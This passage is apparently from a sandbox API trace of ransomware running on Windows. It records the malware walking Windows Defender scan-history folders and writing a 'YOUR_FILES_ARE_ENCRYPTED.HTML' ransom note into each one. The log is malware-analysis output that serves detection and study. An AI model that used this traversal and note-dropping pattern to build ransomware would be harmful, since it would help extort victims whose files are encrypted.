Defender\\Scans\\History\\Mput\\MputHistory\\13" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Scans\\History\\Mput\\MputHistory\\13") returned="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Scans\\History\\Mput\\MputHistory\\13" [0107.576] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Scans\\History\\Mput\\MputHistory\\13", lpString2="\\*" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Scans\\History\\Mput\\MputHistory\\13\\*") returned="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Scans\\History\\Mput\\MputHistory\\13\\*" [0107.576] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Scans\\History\\Mput\\MputHistory\\13\\*", lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x2a531b1c, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x2a531b1c, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x2a531b1c, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x632a08, dwReserved1=0x640130, cFileName=".", cAlternateFileName="")) returned 0x6266f8 [0107.576] FindNextFileW (in: hFindFile=0x6266f8, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x2a531b1c, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x2a531b1c, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x2a531b1c, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x632a08, dwReserved1=0x640130, cFileName="..", cAlternateFileName="")) returned 1 [0107.576] FindNextFileW (in: hFindFile=0x6266f8, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2a531b1c, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x2a531b1c, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x8433ac93, ftLastWriteTime.dwHighDateTime=0x1d7006b, nFileSizeHigh=0x0, nFileSizeLow=0x88, dwReserved0=0x632a08, dwReserved1=0x640130, cFileName="278", cAlternateFileName="")) returned 1 [0107.576] StrStrIW (lpFirst="278", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0107.576] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Scans\\History\\Mput\\MputHistory\\13\\278") returned 83 [0107.576] PathFindExtensionW (pszPath="278") returned="" [0107.576] lstrlenW (lpString="") returned 0 [0107.576] PathFindExtensionW (pszPath="278") returned="" [0107.577] FindNextFileW (in: hFindFile=0x6266f8, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2a531b1c, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x2a531b1c, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x8433ac93, ftLastWriteTime.dwHighDateTime=0x1d7006b, nFileSizeHigh=0x0, nFileSizeLow=0x88, dwReserved0=0x632a08, dwReserved1=0x640130, cFileName="278", cAlternateFileName="")) returned 0 [0107.577] FindClose (in: hFindFile=0x6266f8 | out: hFindFile=0x6266f8) returned 1 [0107.577] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Scans\\History\\Mput\\MputHistory\\13\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 109 [0107.577] GetProcessHeap () returned 0x600000 [0107.577] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x6d47c0 [0107.577] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Scans\\History\\Mput\\MputHistory\\13\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\programdata\\microsoft\\windows defender\\scans\\history\\mput\\mputhistory\\13\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x308 [0107.577] WriteFile (in: hFile=0x308, lpBuffer=0x6d47c0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e17c, lpOverlapped=0x0 | out: lpBuffer=0x6d47c0*, lpNumberOfBytesWritten=0x19e17c*=0x3c00, lpOverlapped=0x0) returned 1 [0107.578] CloseHandle (hObject=0x308) returned 1 [0107.579] GetProcessHeap () returned 0x600000 [0107.579] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6d47c0 | out: hHeap=0x600000) returned 1 [0107.579] GetProcessHeap () returned 0x600000 [0107.579] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x313b008 | out: hHeap=0x600000) returned 1 [0107.580] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x652573eb, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x652573eb, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x652573eb, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6401aa, dwReserved1=0x640128, cFileName="14", cAlternateFileName="")) returned 1 [0107.580] StrStrIW (lpFirst="14", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0107.580] wnsprintfW (in: pszDest=0x6c47b8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Scans\\History\\Mput\\MputHistory\\14") returned 79 [0107.580] GetProcessHeap () returned 0x600000 [0107.580] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x313b008 [0107.581] lstrcpyW (in: lpString1=0x313b008, lpString2="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Scans\\History\\Mput\\MputHistory\\14" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Scans\\History\\Mput\\MputHistory\\14") returned="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Scans\\History\\Mput\\MputHistory\\14" [0107.581] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Scans\\History\\Mput\\MputHistory\\14", lpString2="\\*" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Scans\\History\\Mput\\MputHistory\\14\\*") returned="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Scans\\History\\Mput\\MputHistory\\14\\*" [0107.581] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Scans\\History\\Mput\\MputHistory\\14\\*", lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x652573eb, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x652573eb, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x652573eb, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x632a08, dwReserved1=0x640130, cFileName=".", cAlternateFileName="")) returned 0x6267b8 [0107.628] FindNextFileW (in: hFindFile=0x6267b8, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x652573eb, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x652573eb, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x652573eb, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x632a08, dwReserved1=0x640130, cFileName="..", cAlternateFileName="")) returned 1 [0107.629] FindNextFileW (in: hFindFile=0x6267b8, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x652573eb, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x652573eb, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x8433ac93, ftLastWriteTime.dwHighDateTime=0x1d7006b, nFileSizeHigh=0x0, nFileSizeLow=0x88, dwReserved0=0x632a08, dwReserved1=0x640130, cFileName="9664", cAlternateFileName="")) returned 1 [0107.629] StrStrIW (lpFirst="9664", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0107.629] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Scans\\History\\Mput\\MputHistory\\14\\9664") returned 84 [0107.629] PathFindExtensionW (pszPath="9664") returned="" [0107.629] lstrlenW (lpString="") returned 0 [0107.629] PathFindExtensionW (pszPath="9664") returned="" [0107.629] FindNextFileW (in: hFindFile=0x6267b8, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x652573eb, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x652573eb, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x8433ac93, ftLastWriteTime.dwHighDateTime=0x1d7006b, nFileSizeHigh=0x0, nFileSizeLow=0x88, dwReserved0=0x632a08, dwReserved1=0x640130, cFileName="9664", cAlternateFileName="")) returned 0 [0107.629] FindClose (in: hFindFile=0x6267b8 | out: hFindFile=0x6267b8) returned 1 [0107.629] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Scans\\History\\Mput\\MputHistory\\14\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 109 [0107.629] GetProcessHeap () returned 0x600000 [0107.629] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x6d47c0 [0107.630] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Scans\\History\\Mput\\MputHistory\\14\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\programdata\\microsoft\\windows defender\\scans\\history\\mput\\mputhistory\\14\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x308 [0107.631] WriteFile (in: hFile=0x308, lpBuffer=0x6d47c0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e17c, lpOverlapped=0x0 | out: lpBuffer=0x6d47c0*, lpNumberOfBytesWritten=0x19e17c*=0x3c00, lpOverlapped=0x0) returned 1 [0107.632] CloseHandle (hObject=0x308) returned 1 [0107.632] GetProcessHeap () returned 0x600000 [0107.632] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6d47c0 | out: hHeap=0x600000) returned 1 [0107.632] GetProcessHeap () returned 0x600000 [0107.632] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x313b008 | out: hHeap=0x600000) returned 1 [0107.634] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x2a531b1c, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x2a531b1c, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x652573eb, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6401aa, dwReserved1=0x640128, cFileName="15", cAlternateFileName="")) returned 1 [0107.634] StrStrIW (lpFirst="15", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0107.634] wnsprintfW (in: pszDest=0x6c47b8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Scans\\History\\Mput\\MputHistory\\15") returned 79 [0107.634] GetProcessHeap () returned 0x600000 [0107.634] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x313b008 [0107.635] lstrcpyW (in: lpString1=0x313b008, lpString2="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Scans\\History\\Mput\\MputHistory\\15" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Scans\\History\\Mput\\MputHistory\\15") returned="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Scans\\History\\Mput\\MputHistory\\15" [0107.635] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Scans\\History\\Mput\\MputHistory\\15", lpString2="\\*" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Scans\\History\\Mput\\MputHistory\\15\\*") returned="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Scans\\History\\Mput\\MputHistory\\15\\*" [0107.635] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Scans\\History\\Mput\\MputHistory\\15\\*", lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x2a531b1c, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x2a531b1c, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x652573eb, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x632a08, dwReserved1=0x640130, cFileName=".", cAlternateFileName="")) returned 0x626978 [0107.636] FindNextFileW (in: hFindFile=0x626978, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x2a531b1c, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x2a531b1c, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x652573eb, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x632a08, dwReserved1=0x640130, cFileName="..", cAlternateFileName="")) returned 1 [0107.636] FindNextFileW (in: hFindFile=0x626978, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2a531b1c, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x2a531b1c, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x8433ac93, ftLastWriteTime.dwHighDateTime=0x1d7006b, nFileSizeHigh=0x0, nFileSizeLow=0x88, dwReserved0=0x632a08, dwReserved1=0x640130, cFileName="196", cAlternateFileName="")) returned 1 [0107.636] StrStrIW (lpFirst="196", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0107.636] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Scans\\History\\Mput\\MputHistory\\15\\196") returned 83 [0107.636] PathFindExtensionW (pszPath="196") returned="" [0107.636] lstrlenW (lpString="") returned 0 [0107.636] PathFindExtensionW (pszPath="196") returned="" [0107.637] FindNextFileW (in: hFindFile=0x626978, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2a531b1c, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x2a531b1c, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x8433ac93, ftLastWriteTime.dwHighDateTime=0x1d7006b, nFileSizeHigh=0x0, nFileSizeLow=0x88, dwReserved0=0x632a08, dwReserved1=0x640130, cFileName="262", cAlternateFileName="")) returned 1 [0107.637] StrStrIW (lpFirst="262", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0107.637] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Scans\\History\\Mput\\MputHistory\\15\\262") returned 83 [0107.637] PathFindExtensionW (pszPath="262") returned="" [0107.637] lstrlenW (lpString="") returned 0 [0107.637] PathFindExtensionW (pszPath="262") returned="" [0107.637] FindNextFileW (in: hFindFile=0x626978, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x652573eb, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x652573eb, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x8433ac93, ftLastWriteTime.dwHighDateTime=0x1d7006b, nFileSizeHigh=0x0, nFileSizeLow=0x88, dwReserved0=0x632a08, dwReserved1=0x640130, cFileName="288", cAlternateFileName="")) returned 1 [0107.637] StrStrIW (lpFirst="288", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0107.637] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Scans\\History\\Mput\\MputHistory\\15\\288") returned 83 [0107.637] PathFindExtensionW (pszPath="288") returned="" [0107.637] lstrlenW (lpString="") returned 0 [0107.637] PathFindExtensionW (pszPath="288") returned="" [0107.637] FindNextFileW (in: hFindFile=0x626978, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x652573eb, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x652573eb, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x8433ac93, ftLastWriteTime.dwHighDateTime=0x1d7006b, nFileSizeHigh=0x0, nFileSizeLow=0x88, dwReserved0=0x632a08, dwReserved1=0x640130, cFileName="288", cAlternateFileName="")) returned 0 [0107.637] FindClose (in: hFindFile=0x626978 | out: hFindFile=0x626978) returned 1 [0107.637] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Scans\\History\\Mput\\MputHistory\\15\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 109 [0107.637] GetProcessHeap () returned 0x600000 [0107.637] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x6d47c0 [0107.638] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Scans\\History\\Mput\\MputHistory\\15\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\programdata\\microsoft\\windows defender\\scans\\history\\mput\\mputhistory\\15\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x308 [0107.638] WriteFile (in: hFile=0x308, lpBuffer=0x6d47c0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e17c, lpOverlapped=0x0 | out: lpBuffer=0x6d47c0*, lpNumberOfBytesWritten=0x19e17c*=0x3c00, lpOverlapped=0x0) returned 1 [0107.639] CloseHandle (hObject=0x308) returned 1 [0107.640] GetProcessHeap () returned 0x600000 [0107.640] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6d47c0 | out: hHeap=0x600000) returned 1 [0107.640] GetProcessHeap () returned 0x600000 [0107.640] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x313b008 | out: hHeap=0x600000) returned 1 [0107.644] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x2a531b1c, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x2a531b1c, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x652573eb, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6401aa, dwReserved1=0x640128, cFileName="17", cAlternateFileName="")) returned 1 [0107.644] StrStrIW (lpFirst="17", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0107.644] wnsprintfW (in: pszDest=0x6c47b8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Scans\\History\\Mput\\MputHistory\\17") returned 79 [0107.644] GetProcessHeap () returned 0x600000 [0107.644] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x313b008 [0107.645] lstrcpyW (in: lpString1=0x313b008, lpString2="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Scans\\History\\Mput\\MputHistory\\17" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Scans\\History\\Mput\\MputHistory\\17") returned="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Scans\\History\\Mput\\MputHistory\\17" [0107.645] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Scans\\History\\Mput\\MputHistory\\17", lpString2="\\*" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Scans\\History\\Mput\\MputHistory\\17\\*") returned="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Scans\\History\\Mput\\MputHistory\\17\\*" [0107.645] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Scans\\History\\Mput\\MputHistory\\17\\*", lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x2a531b1c, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x2a531b1c, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x652573eb, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x632a08, dwReserved1=0x640130, cFileName=".", cAlternateFileName="")) returned 0x6266f8 [0107.646] FindNextFileW (in: hFindFile=0x6266f8, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x2a531b1c, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x2a531b1c, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x652573eb, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x632a08, dwReserved1=0x640130, cFileName="..", cAlternateFileName="")) returned 1 [0107.646] FindNextFileW (in: hFindFile=0x6266f8, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2a531b1c, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x2a531b1c, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x8433ac93, ftLastWriteTime.dwHighDateTime=0x1d7006b, nFileSizeHigh=0x0, nFileSizeLow=0x88, dwReserved0=0x632a08, dwReserved1=0x640130, cFileName="109001", cAlternateFileName="")) returned 1 [0107.646] StrStrIW (lpFirst="109001", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0107.646] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Scans\\History\\Mput\\MputHistory\\17\\109001") returned 86 [0107.646] PathFindExtensionW (pszPath="109001") returned="" [0107.646] lstrlenW (lpString="") returned 0 [0107.646] PathFindExtensionW (pszPath="109001") returned="" [0107.646] FindNextFileW (in: hFindFile=0x6266f8, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2a531b1c, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x2a531b1c, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x8433ac93, ftLastWriteTime.dwHighDateTime=0x1d7006b, nFileSizeHigh=0x0, nFileSizeLow=0x88, dwReserved0=0x632a08, dwReserved1=0x640130, cFileName="193", cAlternateFileName="")) returned 1 [0107.646] StrStrIW (lpFirst="193", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0107.646] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Scans\\History\\Mput\\MputHistory\\17\\193") returned 83 [0107.646] PathFindExtensionW (pszPath="193") returned="" [0107.646] lstrlenW (lpString="") returned 0 [0107.646] PathFindExtensionW (pszPath="193") returned="" [0107.646] FindNextFileW (in: hFindFile=0x6266f8, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x652573eb, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x652573eb, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x8433ac93, ftLastWriteTime.dwHighDateTime=0x1d7006b, nFileSizeHigh=0x0, nFileSizeLow=0x88, dwReserved0=0x632a08, dwReserved1=0x640130, cFileName="300", cAlternateFileName="")) returned 1 [0107.646] StrStrIW (lpFirst="300", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0107.646] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Scans\\History\\Mput\\MputHistory\\17\\300") returned 83 [0107.646] PathFindExtensionW (pszPath="300") returned="" [0107.646] lstrlenW (lpString="") returned 0 [0107.646] PathFindExtensionW (pszPath="300") returned="" [0107.647] FindNextFileW (in: hFindFile=0x6266f8, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x652573eb, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x652573eb, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x8433ac93, ftLastWriteTime.dwHighDateTime=0x1d7006b, nFileSizeHigh=0x0, nFileSizeLow=0x88, dwReserved0=0x632a08, dwReserved1=0x640130, cFileName="300", cAlternateFileName="")) returned 0 [0107.647] FindClose (in: hFindFile=0x6266f8 | out: hFindFile=0x6266f8) returned 1 [0107.647] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Scans\\History\\Mput\\MputHistory\\17\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 109 [0107.647] GetProcessHeap () returned 0x600000 [0107.647] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x6d47c0 [0107.648] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Scans\\History\\Mput\\MputHistory\\17\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\programdata\\microsoft\\windows defender\\scans\\history\\mput\\mputhistory\\17\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x308 [0107.648] WriteFile (in: hFile=0x308, lpBuffer=0x6d47c0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e17c, lpOverlapped=0x0 | out: 